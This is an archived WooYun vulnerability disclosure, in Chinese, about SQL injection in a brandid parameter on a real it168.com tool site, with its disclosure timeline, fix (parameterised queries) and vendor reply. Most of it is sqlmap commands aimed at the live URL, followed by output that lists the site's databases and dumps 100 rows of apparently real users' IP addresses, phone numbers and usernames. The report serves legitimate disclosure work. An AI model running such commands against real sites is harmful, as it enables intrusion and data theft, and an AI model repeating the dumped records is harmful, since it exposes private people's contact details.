乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-07: 细节已通知厂商并且等待厂商处理中 2014-10-09: 厂商已经确认,细节仅向厂商公开 2014-10-19: 细节向核心白帽子及相关领域专家公开 2014-10-29: 细节向普通白帽子公开 2014-11-08: 细节向实习白帽子公开 2014-11-21: 细节向公众公开
未对用户输入正确执行危险字符清理
存在注入参数brandidpython sqlmap.py -u "http://hctools.it168.com/submit.php?action=get_brand_print&brandid=*" --dbms=mysql --time-sec=2 --banner
web application technology: PHP 5.5.5, Nginxback-end DBMS: MySQL >= 5.0.0banner: '5.1.50-log'
python sqlmap.py -u "http://hctools.it168.com/submit.php?action=get_brand_print&brandid=*" --dbms=mysql --time-sec=2 --dbsavailable databases [38]:[*] ad[*] aix[*] bsd[*] che[*] comment[*] count[*] cu_download[*] cu_job[*] cu_jobs[*] cublog[*] cucms[*] db_book[*] db_edu[*] db_print[*] db_product[*] db_salon[*] db_techlink[*] db_youxidian[*] diaocha[*] doc[*] ebookmail[*] gongho[*] help[*] hi[*] information_schema[*] ittimes[*] ittimes2[*] linuxpublish[*] mysql[*] newspub[*] test[*] tushu[*] uc_gbk[*] vote[*] vote2[*] wiki[*] wiki_utf8[*] wotuiwole
python sqlmap.py -u "http://hctools.it168.com/submit.php?action=get_brand_print&brandid=*" --dbms=mysql --time-sec=2 -D diaocha -T it168_2009 -C id,ip,phone,username --start=1 --stop=100 --dump取前100条数据Database: diaochaTable: it168_2009[100 entries]+-----+-----------------+----------------------------+----------------------------------------------------------+| id | ip | phone | username |+-----+-----------------+----------------------------+----------------------------------------------------------+| 64 | 202.108.130.138 | 13810759208 | dearcelina || 63 | 222.175.109.50 | 13910182143 | badboyokokok || 62 | 210.51.173.169 | 58022266\\u00a3\\u00ad589 | fire9 || 7 | 123.103.43.232 | 13466592878 | dzb_01 || 8 | 124.64.72.238 | 13811703481 | kid.xiyang || 9 | 123.124.198.195 | 64242299 | duxuetao || 10 | 125.33.130.146 | 13910301945 | eveson || 11 | 125.33.130.146 | 13811810491 | shilihua || 12 | 203.187.191.167 | 13466379758 | agen_0502 || 13 | 202.99.23.184 | 010-65368391\\/15810566366 | TerryGong || 14 | 202.99.23.184 | 010-65368389\\/13910325421 | mrrun || 15 | 221.221.218.251 | 13260003537 | guangzidao || 16 | 125.34.208.136 | 13911463824 | \\u00bd\\u00a3\\u00b4\\u00ce\\u00c0\\u00c7 || 17 | 211.99.216.18 | 150001383472 | yudi2006 || 18 | 211.155.253.89 | 15011051647 | zhangjunyi || 19 | 211.103.237.35 | 15011424628 | cst05001 || 20 | 123.112.82.106 | 13910116314 | polokus || 21 | 218.240.131.114 | 15811055822 | Seker || 22 | 211.99.216.18 | 84562121-1055 | lktpd || 23 | 222.134.206.253 | 13506346064 | zhaoxian || 24 | 222.134.206.253 | 010-62083613 | fadianjizu || 25 | 202.108.145.77 | 13621108444 | ziggler || 26 | 124.192.11.35 | 010-65339328 | jerrywjl || 27 | 219.237.194.111 | 13810436018 | opbsder || 28 | 202.106.68.98 | 13466641423 | Ksharp || 29 | 124.42.101.210 | 13269651468 | senir || 30 | 61.172.241.98 | 13816778816 | crazymeny || 31 | 211.99.216.18 | 13910402240 | sleepycat || 32 | 124.42.101.210 | 13488867086 | firefly.jiang || 33 | 125.69.110.149 | 13540418960 | yellowking || 34 | 123.112.113.91 | 13381221392 | freet15 || 35 | 219.143.44.130 | 15010248504 | gyl4802959 || 36 | 222.128.23.6 | 15810729060 | a1my || 37 | 219.143.47.18 | 13401001191 | arcow || 38 | 221.218.164.211 | 13911152920 | \\u00c5\\u00d6\\u00f3\\u00ac\\u00f3\\u00b0 || 39 | 211.88.30.160 | 15811195112 | \\u00b9\\u00ab\\u00d7\\u00d3Q || 40 | 123.122.101.150 | 15810815043 | shenmue71 || 41 | 202.108.39.249 | 13570214027 | \\u00ce\\u00de\\u00c9\\u00f9\\u00ce\\u00de\\u00cf\\u00a2 || 42 | 222.128.23.6 | 13810832224 | tingfengmanbu || 43 | 202.108.39.249 | 02085106238 | hotsnow || 44 | 202.91.179.43 | 13439954909 | davidhan2009 || 45 | 124.193.83.30 | 13521512328 | hyran || 46 | 61.135.165.11 | 01063001300 | \\u00ca\\u00af\\u00d5\\u00b9 || 47 | 124.205.77.176 | 13661240387 | cindylzh || 48 | 61.135.165.12 | 15010133354 | hdksky || 49 | 211.99.20.6 | 13811431506 | spihiker || 50 | 202.106.94.136 | 13720056292 | xiegang112 || 51 | 210.77.2.98 | 13141322077 | tyc611 || 52 | 123.112.228.164 | 010-63480456 | chuhongze || 53 | 125.34.142.230 | 13911310157 | changchun_li || 54 | 123.127.220.10 | 13426219387 | aero || 55 | 124.205.77.23 | 13426342308 | fashionstyle || 56 | 122.200.74.162 | 13520239976 | chaucerliu || 57 | 202.108.145.11 | 13810929417 | songyupo || 58 | 211.155.253.89 | 13910018687 | hlglty || 59 | 211.155.253.89 | 13811050141 | bithuan || 60 | 218.249.43.227 | 15901232259 | craneflyfly || 61 | 218.19.0.29 | 13005150787 | mamalove || 65 | 124.193.150.98 | 88027749-8091 | ly_cyz || 66 | 211.103.249.4 | 13718227935 | 271329410 || 67 | 211.103.249.4 | 13141370583 | qingyangs || 68 | 218.249.49.194 | 01063182771 | wwj11998 || 69 | 221.222.145.82 | 13488675472 | human.gold || 70 | 59.151.54.34 | 58325249 | redhat.zhou || 71 | 211.157.5.116 | 58325260 | maxcl || 72 | 59.108.42.241 | 010-84105839 | zouyi2005 || 73 | 61.135.159.228 | 13810689432 | h_xin8211 || 74 | 219.237.242.160 | 13269997344 | xiaoqi8866 || 75 | 218.240.136.221 | 15811015463 | tljwcm || 76 | 218.240.136.221 | 58834046 | alexsun72 || 77 | 123.118.119.10 | 15910647819 | niangao1005 || 78 | 202.8.27.5 | 13910627963 | wshun || 79 | 218.247.142.203 | 62135687-866 | cah || 80 | 203.86.84.36 | 13520902241 | \\u00c7\\u00e5\\u00b3\\u00bf\\u00b9\\u00e2 || 81 | 211.151.88.39 | 15801465152 | llfxt || 82 | 221.221.22.162 | 13264294906 | superlifebuoy || 83 | 60.28.240.69 | 13581731367 | dlx1986 || 84 | 219.239.107.2 | 88196725 | gust || 85 | 58.207.156.10 | 13810625240 | litaopier || 86 | 221.221.22.162 | 13810969780 | \\u00b4\\u00ba\\u00c8\\u00a5\\u00c7\\u00ef\\u00c0\\u00b4 || 87 | 219.224.99.205 | 13811450340 | yanaiming || 88 | 210.76.108.158 | 13426332010 | qiaobinbin || 89 | 124.205.77.104 | 15910685356 | billzhou || 90 | 58.83.131.8 | 13393362792 | forward51 || 91 | 60.30.68.151 | 022-63981890 | race || 92 | 58.83.131.8 | 13393362792 | forward52 || 93 | 58.31.141.23 | 15810293009 | pc0326 || 94 | 58.83.131.4 | 13811934236 | dongchun123 || 95 | 124.200.56.57 | 13601216657 | qinershi || 96 | 211.69.198.196 | 15171459982 | dawdo || 97 | 60.10.82.82 | 13910909137 | zhylyq || 98 | 124.64.106.88 | 13811920823 | yj11 || 99 | 123.112.77.47 | (8610)88432858-8252 | liurunfeng || 100 | 124.42.72.18 | 13911319742 | \\u00be\\u00b8\\u00bf\\u00b5 || 101 | 119.143.128.112 | 13372520776 | single_element || 102 | 125.96.85.194 | 62792944-222 | youngcow || 103 | 124.126.86.40 | 13911506054 | cnhtml || 104 | 202.108.130.138 | 13651083526 | winice || 105 | 119.254.240.146 | 13910114233 | RAULNAN || 106 | 218.240.2.98 | 13811088383 | xjc2694 |+-----+-----------------+----------------------------+----------------------------------------------------------+
参数化SQL语句
危害等级:低
漏洞Rank:1
确认时间:2014-10-09 10:28
已终止的业务,内部沟通问题未停止指向,多谢帮助。
暂无